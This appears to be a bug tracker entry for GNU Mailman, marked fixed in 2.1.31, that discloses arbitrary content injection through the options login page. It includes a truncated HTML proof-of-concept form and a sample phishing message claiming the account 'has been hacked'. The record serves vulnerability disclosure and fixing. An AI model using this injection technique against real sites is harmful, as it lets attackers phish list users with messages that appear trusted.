Arbitrary Content Injection via the options login page.
| Affects | Status | Importance | Assigned to | Milestone | |
|---|---|---|---|---|---|
| GNU Mailman |
Fix Released
|
Medium
|
Mark Sapiro | ||
Bug Description
An issue similar to CVE - https:/
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>
<form action="https:/
<input type="hidden" name="email" value="
<input type="hidden" name="UserOptions" value="
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Can be seen there- "Your account has been hacked. Kindly go to https:/
Related branches
CVE References
| Changed in mailman: | |
| milestone: | none → 2.1.31 |
| Changed in mailman: | |
| status: | Confirmed → Fix Released |
| information type: | Private Security → Public |
